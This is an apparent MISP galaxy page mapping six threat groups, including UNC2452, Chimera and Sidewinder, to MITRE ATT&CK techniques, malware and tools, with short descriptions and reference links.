https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/
https://pan-unit42.github.io/playbook_viewer/

BlackTech - G0098

[BlackTech](https://attack.mitre.org/groups/G0098) is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong.(Citation: TrendMicro BlackTech June 2017)

The tag is: misp-galaxy:mitre-intrusion-set="BlackTech - G0098"

BlackTech - G0098 is also known as:

BlackTech

View relationships graph

BlackTech - G0098 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Right-to-Left Override - T1036.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="TSCookie - S0436" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PLEAD - S0435" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Kivars - S0437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Waterbear - S0579" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 4568. Table References
Links
https://attack.mitre.org/groups/G0098
https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/

UNC2452 - G0118

The tag is: misp-galaxy:mitre-intrusion-set="UNC2452 - G0118"

View relationships graph

UNC2452 - G0118 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exchange Email Delegate Permissions - T1098.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Cookies - T1606.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SAML Tokens - T1606.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="AdFind - S0552" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SUNBURST - S0559" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="TEARDROP - S0560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SUNSPOT - S0562" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1550.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Trust Modification - T1484.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Raindrop - S0565" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1584.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="GoldMax - S0588" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Sibot - S0589" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internet Connection Discovery - T1016.001" with estimative-language:likelihood-probability="almost-certain"
revoked-by: misp-galaxy:mitre-intrusion-set="APT29 - G0016" with estimative-language:likelihood-probability="almost-certain"

Table 4569. Table References
Links
https://attack.mitre.org/groups/G0118
https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/

TA551 - G0127

[TA551](https://attack.mitre.org/groups/G0127) is a financially-motivated threat group that has been active since at least 2018. (Citation: Secureworks GOLD CABIN) The group has primarily targeted English, German, Italian, and Japanese speakers through email-based malware distribution campaigns. (Citation: Unit 42 TA551 Jan 2021)

The tag is: misp-galaxy:mitre-intrusion-set="TA551 - G0127"

TA551 - G0127 is also known as:

TA551
GOLD CABIN
Shathak

View relationships graph

TA551 - G0127 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="IcedID - S0483" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Valak - S0476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Ursnif - S0386" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="QakBot - S0650" with estimative-language:likelihood-probability="almost-certain"

Table 4570. Table References
Links
https://attack.mitre.org/groups/G0127
https://www.secureworks.com/research/threat-profiles/gold-cabin
https://unit42.paloaltonetworks.com/ta551-shathak-icedid/
https://unit42.paloaltonetworks.com/valak-evolution/

Sidewinder - G0121

[Sidewinder](https://attack.mitre.org/groups/G0121) is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.(Citation: ATT Sidewinder January 2021)(Citation: Securelist APT Trends April 2018)(Citation: Cyble Sidewinder September 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Sidewinder - G0121"

Sidewinder - G0121 is also known as:

Sidewinder
T-APT-04
Rattlesnake

View relationships graph

Sidewinder - G0121 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1598.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Koadic - S0250" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 4571. Table References
Links
https://attack.mitre.org/groups/G0121
https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf
https://securelist.com/apt-trends-report-q1-2018/85280/
https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/

Windshift - G0112

[Windshift](https://attack.mitre.org/groups/G0112) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Windshift - G0112"

Windshift - G0112 is also known as:

Windshift
Bahamut

View relationships graph

Windshift - G0112 has relationships with:

uses: misp-galaxy:mitre-malware="WindTail - S0466" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Geofencing - T1581" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1521" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

Table 4572. Table References
Links
https://attack.mitre.org/groups/G0112
https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf
https://objective-see.com/blog/blog_0x3B.html
https://objective-see.com/blog/blog_0x3D.html

Chimera - G0114

[Chimera](https://attack.mitre.org/groups/G0114) is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Chimera - G0114"

Chimera - G0114 is also known as:

Chimera

View relationships graph

Chimera - G0114 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Controller Authentication - T1556.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="BloodHound - S0521" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials - T1589.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="esentutl - S0404" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Sharepoint - T1213.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Two-Factor Authentication Interception - T1111" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4573. Table References
Links
https://attack.mitre.org/groups/G0114
https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf
